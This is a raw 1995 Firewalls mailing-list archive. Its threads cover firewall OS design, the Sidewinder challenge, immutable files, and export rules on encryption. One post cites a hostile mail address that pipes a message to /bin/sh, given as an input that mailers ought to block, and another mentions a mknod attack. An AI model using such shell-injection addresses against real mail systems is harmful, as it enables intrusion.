Huh?") no network daemons, no NFS, > no spending hours vetting your UNIX config to see what nonsense > the vendor left there, etc, etc. If the firewall process crashes, > the system instantly becomes inoperative. Pretty clever, really. > Basically, you accept the fact that the firewall is a special purpose > machine and treat it accordingly. > I'd rather run DOS than B1, and frankly, I suspect a DOS > box running a single program that just manages IP firewalling is a > hell of a lot harder to break into than a CMW or some kind of UNIX > box running B1. (and a little cheaper and easier to manage) > > mjr. > And if your software breaks, you also have no protection of the system from the user. And no idea what happened to the system or how it happened or that it happened. Plus you're handing the security of your organization over to an unevaluated black box based on someones idea of what security means. Has that idea seen the light of peer review? Or can anyone order one of these, do some disassembly and find an easy hole? Plus DOS may be listening to more than you think if it has a tcp/ip stack. Do you have source to the tcp/ip code? I can just as easily run B1 unix w/o network daemons if all I want to live w/o proxies. If you proxy in DOS or windows, then the OS has absolutly no protection from software errors. Mark Riggins Secure Systems Engineering AT&T Bell Labs From firewalls-owner Thu Aug 10 22:00:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA06494 for firewalls-outgoing; Thu, 10 Aug 1995 21:31:08 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA06478 for ; Thu, 10 Aug 1995 21:31:05 -0700 Received: from unknown(137.39.156.214) by miles via smap (V1.3) id sma006474; Thu Aug 10 21:30:52 1995 Received: (from mjr@localhost) by switchblade.iwi.com (8.6.9/8.6.9) id AAA15591; Fri, 11 Aug 1995 00:36:42 -0400 From: "Marcus J. Ranum" Message-Id: <199508110436.AAA15591@switchblade.iwi.com> Subject: Re: s[id]ewinder To: smith@sctc.com (Rick Smith) Date: Fri, 11 Aug 1995 00:36:41 -0400 (EDT) Cc: mjr@iwi.com, smith@sctc.com, firewalls@GreatCircle.COM In-Reply-To: <199508101817.NAA26039@shade.sctc.com> from "Rick Smith" at Aug 10, 95 01:17:39 pm Reply-To: mjr@iwi.com Organization: Information Works! Inc, Baltimore, MD URL: mjr's web page Phone: 410-889-8569 Coredump: Infocalypse Now!!! X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 362 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Rick Smith writes: >I think it's an interesting commentary on The World Out There that >customers are more impressed by the Sidewinder Challenge as evidence >of effective security than they are in the SMG's formal assurance. Yes, uninformed customers are easily impressed by flash. You're surprised by that? I thought that was the point of the exercise! mjr. From firewalls-owner Thu Aug 10 22:17:17 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA06658 for firewalls-outgoing; Thu, 10 Aug 1995 21:39:08 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA06642 for ; Thu, 10 Aug 1995 21:39:05 -0700 Received: from gw.worldbit.com(199.4.64.236) by miles via smap (V1.3) id sma006638; Thu Aug 10 21:38:19 1995 Received: (blast@localhost) by world1.worldbit.com (8.6.10/A/UX 3.1) id VAA17343; Thu, 10 Aug 1995 21:48:52 -0700 Date: Thu, 10 Aug 1995 21:48:52 -0700 (PDT) From: Tim Keanini To: firewalls@greatcircle.com Subject: cu-seeme udp ports Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Without pulling out my sniffer, can someone confirm that I am making the right assumptions on a cu-seeme session. client server udp >1023 udp eq 7648 udp >1023 udp eq 7649 udp >1023 udp eq 7650 udp >1023 udp eq 7651 I got these "well known ports" from the server code in the #define's. Can someone tell me if I have assumed correctly or if the cu-seeme culture has picked other ports for their udp ports. Before anyone starts to tell me about evil udp traffic, I am just wondering about this. I am not putting a network in danger. :-) Please reply to me personally so that I can summurize and reply with one answer. --blast %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \ Tim Keanini | "The limits of my language, / / aka blast | are the limits of my world." \ \ | --Ludwig Wittgenstein / / | \ \ +================================================/ / PUB KEY: http://www-swiss.ai.mit.edu/~bal/pks-commands.html \ \ / %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% From firewalls-owner Thu Aug 10 22:35:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA07476 for firewalls-outgoing; Thu, 10 Aug 1995 22:09:16 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA07451 for ; Thu, 10 Aug 1995 22:09:12 -0700 Received: from comm.cpd.tandem.com(130.252.12.3) by miles via smap (V1.3) id sma007439; Thu Aug 10 22:08:24 1995 Received: by comm.tandem.com (4.13/4.5) id AA18745; 10 Aug 95 22:07:26 +1700 Date: 10 Aug 95 13:46:00 +1700 From: MAHAJAN_VIVEK@tandem.com Message-Id: <199508102207.AA18745@comm.tandem.com> To: firewalls@greatcircle.com Subject: Type enforcement ??? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello: Is there a document out there that explains what is type enforcement. One of the commercial firewall vendors I talked to explained to me that theirs is the only product that implements type enforcement and this gives their product a level of security no other product in the market does. I am quite familiar with the different firewall products and what kind of implementation they have but I am not quite familiar with what was described to me as "true type enforcement." What does it mean in the context of firewalls and where if any can I get more information about this concept? I would appreciate any help. Regards Vivek From firewalls-owner Thu Aug 10 22:36:17 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA06901 for firewalls-outgoing; Thu, 10 Aug 1995 21:48:07 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA06893 for ; Thu, 10 Aug 1995 21:48:05 -0700 Received: from unknown(137.39.156.214) by miles via smap (V1.3) id sma006891; Thu Aug 10 21:47:58 1995 Received: (from mjr@localhost) by switchblade.iwi.com (8.6.9/8.6.9) id AAA15612; Fri, 11 Aug 1995 00:53:47 -0400 From: "Marcus J. Ranum" Message-Id: <199508110453.AAA15612@switchblade.iwi.com> Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls To: mdr@vodka.sse.att.com Date: Fri, 11 Aug 1995 00:53:46 -0400 (EDT) Cc: mjr@iwi.com, firewalls@greatcircle.com In-Reply-To: <9508101726.AA26464@ig1.att.att.com> from "mdr@vodka.sse.att.com" at Aug 10, 95 01:27:54 pm Reply-To: mjr@iwi.com Organization: Information Works! Inc, Baltimore, MD URL: mjr's web page Phone: 410-889-8569 Coredump: Infocalypse Now!!! X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 1989 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk mdr@vodka.sse.att.com writes: >Thankyou for the excellent information on bsd. Looks like they put some >thought into it, that's good to see. So writing /dev/kmem or the raw >divices won't work. Let me try a few more jabs at it if you don't mind, >before we call it a security feature. Why don't you RTFM before you take a few more jabs at it and then you'll waste less time? Just a friendly suggestion. >How do they administer the system in mulituser mode? Presumably adding >users and accounts and such would be disallowed. Also adding undesired >services such as a telnetd or packet grabber would be disallowed. You only set immutable on files you want it on. Devices and special files get default immutability at certain run levels but tagging it on a file is the admin's option. So if you set all the files in /etc/ as immutable then, sure, administering the machine would be complicated. >If I can affect any file that root runs during single user mode, I can >still hack the system, I just have to wait for a re-boot. This is a good point. BUT I'd like you to consider the fact that the immutable files feature has closed off a whole category of well-known weaknesses, and has given the administrator a useful tool to help build more solid systems. It's not too intrusive and it's not too awkward, and it's easy to understand and I suspect that I will find several cases in the next few years where I'll be glad to have it. You're welcome to dismiss immutable files as "security speak" rather than real security (whatever that is) but I suspect it'll help improve UNIX system security some small bit - I know I wish Suns, HPs, DECs, etc, had at least the device lockdown stuff. Every little bit helps. That's my own little heresy. I know the Association of Computer Security Graybeards don't want to do ANYTHING unless it's DONE RIGHT FOR SURE but sometimes you can close off whole categories of problems with a line or two of code, and you're crazy not to. mjr. From firewalls-owner Thu Aug 10 22:59:55 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA07634 for firewalls-outgoing; Thu, 10 Aug 1995 22:15:17 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA07602 for ; Thu, 10 Aug 1995 22:15:12 -0700 Received: from unknown(137.39.156.214) by miles via smap (V1.3) id sma007590; Thu Aug 10 22:14:17 1995 Received: (from mjr@localhost) by switchblade.iwi.com (8.6.9/8.6.9) id BAA15636; Fri, 11 Aug 1995 01:19:47 -0400 From: "Marcus J. Ranum" Message-Id: <199508110519.BAA15636@switchblade.iwi.com> Subject: Re: Multilevel Security is good for firewalls To: mdr@vodka.sse.att.com Date: Fri, 11 Aug 1995 01:19:46 -0400 (EDT) Cc: mjr@iwi.com, firewalls@greatcircle.com In-Reply-To: <9508101832.AA01220@ig1.att.att.com> from "mdr@vodka.sse.att.com" at Aug 10, 95 02:34:02 pm Reply-To: mjr@iwi.com Organization: Information Works! Inc, Baltimore, MD URL: mjr's web page Phone: 410-889-8569 Coredump: Infocalypse Now!!! X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 2170 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >I can just as easily run B1 unix w/o network daemons if all I want to >live w/o proxies. If you proxy in DOS or windows, then the OS has >absolutly no protection from software errors. [I may get the orange-bookspeak wrong, but I'm sure some kind soul will correct me if I do] My impression is that in orange book land, a proxy is a "trusted process." It takes advantage of the features of the TCB (Trusted Computing Base) that protect the system, but, because it's moving stuff around, the designer is trusting that it does at least some of that stuff right. But if there's a software error in the proxy, then it's just as much a problem as if there's a software error in a proxy on an un-orange book system. Of course, a trusted process' software gets carefully evaluated and formally modelled and all that stuff, too. But if there's a flaw, it is still a potentially fatal flaw. Put another way: if you run plug-gw for telnet between * and your inside network you're still wide open, B1 or no B1. This is why I keep urging people to recognize that there are TWO (at least) protective relationships that a firewall embodies. How well it protects itself from attack How well it protects its network from attack All the orange book protections help with the firewall's protecting itself from attack, but don't do anything for the network, unless you're running B1 on the inside network, and labelling and a complete trusted environment. Most commercial networks don't do that, and won't ever do that. And if they do, they'll rip it out in 2 years. So: consider that the firewall must protect the helpless machines behind it, which are running SunOS, AIX, and Windows for workgroups + IP. :) Now, the question is: what does my firewall do for them? The B1-ness of the firewall at that point is totally irrelevant. What's now important is whether or not the mailer blocks out "| sed '1,/^$/d' | /bin/sh" as a Reply-To address, and whether the trusted FTP service on the firewall binds ftp-data when it talks to the inside, and so on. Those details are reflected not in formal methods, but in niggling, ugly, policy reflected in lines of code. mjr. From firewalls-owner Thu Aug 10 23:00:14 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA08426 for firewalls-outgoing; Thu, 10 Aug 1995 22:34:20 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA08403 for ; Thu, 10 Aug 1995 22:34:16 -0700 Received: from gateway.cpd.tandem.com(130.252.12.3) by miles via smap (V1.3) id sma008397; Thu Aug 10 22:33:48 1995 Received: by comm.tandem.com (4.13/4.5) id AA15673; 10 Aug 95 22:32:50 +1700 Date: 10 Aug 95 17:06:00 +1700 From: MAHAJAN_VIVEK@tandem.com Message-Id: <199508102232.AA15673@comm.tandem.com> To: firewalls@greatcircle.com Subject: Encrypted data across national boundaries??? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello: I have followed closed the discussion on encrypted ftp. I have looked over what are the options available and have found that there are always some kind of restrictions associated with each option. If there is a need to send data to about 50 countries (including places such as Russia/China) is there any kind of encryption solution either hardware or software that can be used across the board? The data will originate from London for Europe, from Singapore and Australia for Asia, and from USA for North and South America. According to what I have looked into there is no solution that will allow a standard acceptable encrption method without violating export laws of the countries from which the data originates. Even if there a standard for North and South America, a standard for Europe, and a standard for Asia and Australia that would be acceptable. Any help would be appreciated. Regards Vivek From firewalls-owner Thu Aug 10 23:35:19 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA10696 for firewalls-outgoing; Thu, 10 Aug 1995 23:17:04 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA10597 for ; Thu, 10 Aug 1995 23:16:49 -0700 Received: from netcom7.netcom.com(192.100.81.115) by miles via smap (V1.3) id sma010581; Thu Aug 10 23:16:37 1995 Received: by netcom7.netcom.com (8.6.12/Netcom) id XAA05897; Thu, 10 Aug 1995 23:13:12 -0700 Date: Thu, 10 Aug 1995 23:13:11 -0700 (PDT) From: Damien Sorder Subject: Re: sleazewinder To: David Kovar cc: *Hobbit* , firewalls@GreatCircle.COM In-Reply-To: <199508091658.MAA02175@nda.nda.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > The only result of this that I've seen so far is at a trade show the > other week. At their booth they were announcing something like: > > Hackers: 0% > Sidewinder: 100% > > Sidewinder stopped every single one of the best hackers efforts! You are assuming the best tried.. which is probably incorrect. From firewalls-owner Fri Aug 11 03:00:36 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA15863 for firewalls-outgoing; Fri, 11 Aug 1995 02:35:21 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA15843 for ; Fri, 11 Aug 1995 02:35:14 -0700 Received: from yarrina.connect.com.au(192.189.54.17) by miles via smap (V1.3) id sma015839; Fri Aug 11 02:34:17 1995 Received: (from root@localhost) by yarrina.connect.com.au with UUCP id TAA13532 (8.6.12/IDA-1.6); Fri, 11 Aug 1995 19:31:54 +1000 Received: by junkers.lochard.com.au id AA52971 (5.65c/IDA-1.5); Fri, 11 Aug 1995 18:28:46 +1100 From: Mark Message-Id: <199508110728.AA52971@junkers.lochard.com.au> Subject: Re: s[id]ewinder To: smith@sctc.com (Rick Smith) Date: Fri, 11 Aug 1995 18:28:46 +1000 (E ) Cc: firewalls@GreatCircle.COM, smith@sctc.com In-Reply-To: <199508092131.QAA05680@shade.sctc.com> from "Rick Smith" at Aug 9, 95 04:31:17 pm Content-Type: text Content-Length: 2122 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >The Challenge is to break through the firewall and extract a message >stored on the challenge site's LAN. I've never seen anyone broadcast >a copy of the message, so I doubt anyone has really managed to reach >it. We do hear third hand reports of "consultants" and sales droids >who claim to have broken Sidewinder so they can sell some snake oil. > >We *did* give out a jacket once to someone who did something truly >inspired (used mknod to construct an alternative path to the disk >drive) even though the guy didn't reach the internal net. Of course, >we fixed that bug. It's written up in Dan's paper for the next CSAC. If I were to change ideology and think as a cracker :), the last thing in the english speaking world I would do would be to use my ultra top secret KY^2 technique against the challenge hosts. I would *know* that every packet into the machine is being written to a log and the technique will be analysed and maybe published so all of the net can close the hole. What egoless night typer would want that to happen, suddenly waking up to find the net humming with news of the break in method and realising that pretentious dorky jacket hanging in the closet was the reason for it. It's dumb and serves little or no purpose for anyone with an ounce of knowledge to go and try anything remotely useful on the sidewinder host(s). If one wanted notoriety there are much easier ways to do it, break into apple.com and publish MacOS code or microsft.com and publish Windoze code. You would certainly get a much bigger juicer out of that and the amount of friends you would make because of it (should you be dumb enough to go public) would be staggering. Plus you dont have to reveal your methods. In other words, very few people with an ounce of insight is taking this challenge very seriously at all. I certainly regard it as flag waving. Mark mark@lochard.com.au My opinions are my own. P.S. I personally regard doing a black bag job on the STSC offices a much less obvious way of getting the info :) Time to drag out the crowbars and TEMPEST antenni. Claiming the reward would be another story. From firewalls-owner Fri Aug 11 03:30:21 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA16353 for firewalls-outgoing; Fri, 11 Aug 1995 03:02:27 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA16345 for ; Fri, 11 Aug 1995 03:02:25 -0700 Received: from bass.com.my(161.142.248.42) by miles via smap (V1.3) id sma016316; Fri Aug 11 03:01:23 1995 Received: from bass.bass.com.my (gw.bass.com.my) by bass.com.my with SMTP id AA18273 (5.67a/IDA-1.5 for ); Fri, 11 Aug 1995 18:00:41 +0800 Received: by bass.bass.com.my (4.1/SMI-4.1) id AA02886; Fri, 11 Aug 95 17:58:38 MYT Date: Fri, 11 Aug 1995 17:55:55 +0800 (MYT) From: Tham Huei Hwan Reply-To: Tham Huei Hwan Subject: Internet To: firewalls@greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I am new in this mailling list and also new in internet, any body can inform me where can get the information from the internet or by e-mail ? Thank You. E-mail: Tham.Huei.Hwan@bass.com.my From firewalls-owner Fri Aug 11 04:04:59 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA18497 for firewalls-outgoing; Fri, 11 Aug 1995 03:52:51 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA18481 for ; Fri, 11 Aug 1995 03:52:46 -0700 Received: from sonyinet.sony.co.jp(202.24.32.17) by miles via smap (V1.3) id sma018439; Fri Aug 11 03:52:06 1995 Received: from sonygw.sony.co.jp ([43.0.1.249]) by sonyinet.sony.co.jp (8.6.10/3.3Wb-95072713) with SMTP id TAA21452 for ; Fri, 11 Aug 1995 19:50:52 +0900 Received: from sabakon.adv.sbc.sony.co.jp ([43.194.41.150]) by sonygw.sony.co.jp (4.0/6.4J.6) id AA00314; Fri, 11 Aug 95 19:50:31 JST Received: from adv.sbc.sony.co.jp (ptah) by sabakon.adv.sbc.sony.co.jp (4.1/6.4J.6-sbc) id AA00267; Fri, 11 Aug 95 11:52:42 BST Received: by adv.sbc.sony.co.jp (5.x/SMI-SVR4) id AA06986; Fri, 11 Aug 1995 11:48:38 +0100 Date: Fri, 11 Aug 1995 11:48:38 +0100 From: se@adv.sbc.sony.co.jp (Steve England) Message-Id: <9508111048.AA06986@adv.sbc.sony.co.jp> To: firewalls@greatcircle.com Subject: Attack, Attack, Attack X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Realising this is not a full disclosure list ala bugtraq et al - but trying to stick to the philosophy of the lists intention, i ask the following. Given a lot of us (how many times have you seen the words "newbie", "decloaking" etc. prepending a question) havent the privileged rite of passage to obtain attack strategies, types of break-in, how to break-in, how to gain root once inside etc. that the luminaries of this list get to see/hear about/experience first hand/know from having years experience (apologies if this is not the case). How do the rest of us get to know these ? Whilst i'm not (quite) asking for "how do i break into site X" i believe there is a lot that can be shared by the above said people to aid us *newer* people - can we share this kind of info within this list (Brent ?) otherwise arent all we are doing is practising another form of security through obscurity ? ie. the few that know versus the most that dont ? inasmuch as a typical firewall admin "well we can stop attack a,b,c cos we know about them from CERT/CIAC/bugtraq/ids/... but we cant stop d,e,f... cos we dont know what they are". By the individuals mentioned sharing this info will help others with their firewall setup/testing/monitoring (albeit not particularly scientific in nature) & may lead them to spawn other ideas of how the methods hopefully presented may be mutated to try to gain access/resources - hence getting them into an attackers mindset (?!). I guess what i'm after is compiling a cookbook in effect that may lead to other attacks being realised & shared with the list (not that i believe for one minute that Security of any form is merely a check list). This may have a positive knock-on affect of vendors listening in to test their product(s) prior to release for the attacks mentioned. Steve From firewalls-owner Fri Aug 11 05:00:29 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA20240 for firewalls-outgoing; Fri, 11 Aug 1995 04:37:06 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA20223 for ; Fri, 11 Aug 1995 04:37:03 -0700 Received: from uud01.capvolmac.nl(193.78.92.33) by miles via smap (V1.3) id sma020210; Fri Aug 11 04:36:03 1995 Received: from inetgate.capvolmac.nl by uud01.capvolmac.nl (uud01 3.2/UCB 5.64/4.03) id AA33589; Fri, 11 Aug 1995 13:34:51 +0200 Received: from WUD00-Message_Server by inetgate.capvolmac.nl with Novell_GroupWise; Fri, 11 Aug 1995 13:34:06 +0100 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Fri, 11 Aug 1995 13:28:41 +0100 From: Sander Wels To: Tham.Huei.Hwan@bass.com.my, firewalls@greatcircle.com Subject: Internet (A) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Try "Accessing the Internet By E-Mail" Doctor Bob's Guide to Offline Internet Access You can receive a copy by sending an e-mail to : listserv@ubvm.cc.buffalo.edu Enter only this line in the BODY of the note: GET INTERNET BY-EMAIL NETTRAIN F=MAIL An other interesting idea is to subscribe to the BUSTOUR: send a mail to "majordomo@colossus.net in the BODY of the mail: SUBSCRIBE TOURBUS Get more information from the Roadmap workshops: To find out how to retrieve the Roadmap workshop lessons, and to find out a little more about the Roadmap workshop itself, all you have to do is send an e-mail letter to LISTSERV@UA1VM.UA.EDU (that's "you-ay-won-vee-em") with the command GET MAP PACKAGE F=MAIL in the *BODY* of your e-mail letter. NOTE: Simply replying to the letter that you are reading right now with a GET MAP PACKAGE F=MAIL command will *NOT* work. You must send a *NEW* letter to LISTSERV@UA1VM.UA.EDU with the command GET MAP PACKAGE F=MAIL in the body of your letter for your command to work. After you send your letter off, a computer at the University of Alabama will process your letter, and will -- usually within 24 hours -- e-mail you two letters: one telling you a little more about the Roadmap workshop, and another telling you how you can retrieve the workshop lessons with a few, simple e-mail commands. Cheers, Sander Wels >>> Tham Huei Hwan 11-08-95 10.55 >>> Hi, I am new in this mailling list and also new in internet, any body can inform me where can get the information from the internet or by e-mail ? Thank You. E-mail: Tham.Huei.Hwan@bass.com.my From firewalls-owner Fri Aug 11 05:30:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA20915 for firewalls-outgoing; Fri, 11 Aug 1995 05:08:20 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA20899 for ; Fri, 11 Aug 1995 05:08:16 -0700 Received: from caesar.udac.se(193.44.79.10) by miles via smap (V1.3) id sma020895; Fri Aug 11 05:08:04 1995 Received: from [193.44.77.24] (mac-77-24.UDAC.SE) by caesar.udac.se with SMTP id AA30233 (5.67b-Emil1.1/IDA-1.5 for ); Fri, 11 Aug 1995 14:07:11 +0200 Message-Id: Date: Fri, 11 Aug 1995 14:08:20 +0200 To: firewalls@greatcircle.com From: Mats.Bredell@udac.se (Mats Bredell) Subject: Re: Encrypted data across national boundaries??? Cc: MAHAJAN_VIVEK@tandem.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Hello: >I have followed closed the discussion on encrypted ftp. I have looked over >what are the options available and have found that there are always some kind >of restrictions associated with each option. If there is a need to send data >to about 50 countries (including places such as Russia/China) is there any >kind of encryption solution either hardware or software that can be used >across the board? The data will originate from London for Europe, from >Singapore and Australia for Asia, and from USA for North and South America. >According to what I have looked into there is no solution that will allow a >standard acceptable encrption method without violating export laws of the >countries from which the data originates. Even if there a standard for >North and South America, a standard for Europe, and a standard for Asia and >Australia that would be acceptable. How about getting the free SSL library from Australia? It uses SSL for authentication and encryption, and there are patches available for the most common clients and servers. Using this you should be able to cover most of the world. One exception is probably France. Also, if you use it in the US you have to pay RSA a license fee. Would this work? /Mats ------------------------------------------------------------------- Mats Bredell Mats.Bredell@udac.se UDAC / Network C Communication service systems Ph: +46 18 187817 Sweden Fax: +46 18 516600 From firewalls-owner Fri Aug 11 06:00:30 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA21989 for firewalls-outgoing; Fri, 11 Aug 1995 05:36:29 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA21965 for ; Fri, 11 Aug 1995 05:36:26 -0700 Received: from uvs1.orl.mmc.com(141.240.192.10) by miles via smap (V1.3) id sma021955; Fri Aug 11 05:35:39 1995 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA15214; Fri, 11 Aug 95 08:21:48 -0400 Date: Fri, 11 Aug 95 08:21:47 -0400 Message-Id: <9508111221.AA15214@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: To OS or not to OS Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Andrew rites: >We believe that any general purpose OS(especially UNIX), is less than ideal >for a FW, since it has a lot of overhead and a lot of potential for security >holes due to it's complexity. >A special purpose system with a very small code base and NO extra >unnecessary services can provide the best performing most secure firewall. Exactly the point I was trying to make. In a PC, the Basic Input Output System (BIOS) provides everything that is needed to run the computer. MS/PC/DR/NW-DOS, OS/2, Novell Netware, Linux, BSD just build on this structure or use it to load their own structure. It is entirely possible to create a dedicated limited-functionality machine using 32 bit structures and ring separation by starting with nothing more than the ROM-BIOS that comes with every PC. Now this is not trivial. I do most such programming with a "fixed" version of MASM. AFAIK there are no commercial C or C++ libraries available though it is known that certain large organizations use C for OS development so... It has been my experience that such programming has the advantage of being very tight (part of the reason my a-v stuff is so small). Being in ROM, the BIOS also has the advantage of being fixed (yes I know about flash ROM - is your choice), verifyable, and fully capable. It is not an "easy way out" though, it does require some effort to master but IMNSHO can also be very rewarding. Just ask Bill Gates. Warmly, Padgett From firewalls-owner Fri Aug 11 06:35:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA24363 for firewalls-outgoing; Fri, 11 Aug 1995 06:26:25 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA24347 for ; Fri, 11 Aug 1995 06:26:22 -0700 Received: from uvs1.orl.mmc.com(141.240.192.10) by miles via smap (V1.3) id sma024341; Fri Aug 11 06:25:32 1995 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA15381; Fri, 11 Aug 95 09:02:23 -0400 Date: Fri, 11 Aug 95 09:02:23 -0400 Message-Id: <9508111302.AA15381@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Encrypted data across national boundaries Sender: firewalls-owner@GreatCircle.COM Precedence: bulk 1) Contrary to popular belief I am an engineer, not a lawyer. 2) The issue is not a single one, but rather multiple. a) crypto mechanism i) export from point of origin ii) in transit between country of origin and country of originator iii) import to originator iv) export from originator's site v) in transit from originator's country to recipients country vi) import to each recipient's site b) encrypted messages i) within country of origin ii) in transit over intervening areas iii) within country of receipt c) legality of use i) in country of origin ii) in country of receipt It is true today that some of these are not a problem (b-ii) but may well be in the near future. (a-ii) & (a-v) are specifically covered in ITAR, not just (a-i). (c) is not a factor in the US but appears to be being considered in AU. Each is a separate issue. Consider PGP. For an American business communicating with a site in France ITAR says that the US company may not send the PGP software to the recipient. (a-1) so they will have to tell the French site to get their own (PGP 2.62i). - am not sure if this would be a violation of (a-iii), I don't get paid for this you know 8*). (b-iii) requires permission. Today in the US (b-i) does not. If the company downloaded the domestic copy from MIT instead of buying it from ViaCrypt, they are in violation of (c-1). Bottom line: to be responsible, each area must be checked off (let me know if I missed something) and this just covers the basics - nothing to do with *what* messages are sent. Is not as simple as it looks. Warmly, Padgett From firewalls-owner Fri Aug 11 07:09:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA23186 for firewalls-outgoing; Fri, 11 Aug 1995 06:06:49 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA23170 for ; Fri, 11 Aug 1995 06:06:46 -0700 Received: from theory.tc.cornell.edu(132.236.98.174) by miles via smap (V1.3) id sma023166; Fri Aug 11 06:06:23 1995 Received: (from uactech@localhost) by theory.tc.cornell.edu (8.6.9/8.6.6) id JAA95429; Fri, 11 Aug 1995 09:05:15 -0400 Received: from ovid by ithaca.actech.com (920330.SGI/SMI-4.0) id AA20542; Fri, 11 Aug 95 09:04:04 -0400 Received: by ovid.actech.com (5.x/SMI-SVR4) id AA18395; Fri, 11 Aug 1995 09:04:01 -0400 Received: from Messages.8.5.N.CUILIB.3.45.SNAP.NOT.LINKED.ovid.sun4.51 via MS.5.6.ovid.sun4_51; Fri, 11 Aug 1995 09:04:00 -0400 (EDT) Message-Id: Date: Fri, 11 Aug 1995 09:04:00 -0400 (EDT) From: Steve Gaarder To: firewalls@GreatCircle.COM, MAHAJAN_VIVEK@tandem.com Subject: Re: Encrypted data across national boundaries??? In-Reply-To: <199508102232.AA15673@comm.tandem.com> References: <199508102232.AA15673@comm.tandem.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I, too have been looking for an encryption system that can be used internationally. I think I may have found something, though it doesn't address countries such as Russia where strong encryption is outlawed. The package is ssh, an encrypted replacement for rsh. It supports tunnelling X and other protocols. And it was developed outside the US! I've downloaded it but so far have only just started to play with it. More info is at http://www.cs.hut.fi/ssh. Steven Gaarder Network and Systems Administrator gaarder@actech.com A C Technology, Ithaca, N.Y., USA From firewalls-owner Fri Aug 11 07:19:48 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA25086 for firewalls-outgoing; Fri, 11 Aug 1995 06:56:28 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA25052 for ; Fri, 11 Aug 1995 06:56:23 -0700 Received: from ns1.maf.mobile.al.us(199.78.232.2) by miles via smap (V1.3) id sma025046; Fri Aug 11 06:55:40 1995 Received: from ns1 by ns1.maf.mobile.al.us (5.x/SMI-SVR4) id AA06053; Fri, 11 Aug 1995 08:52:45 -0500 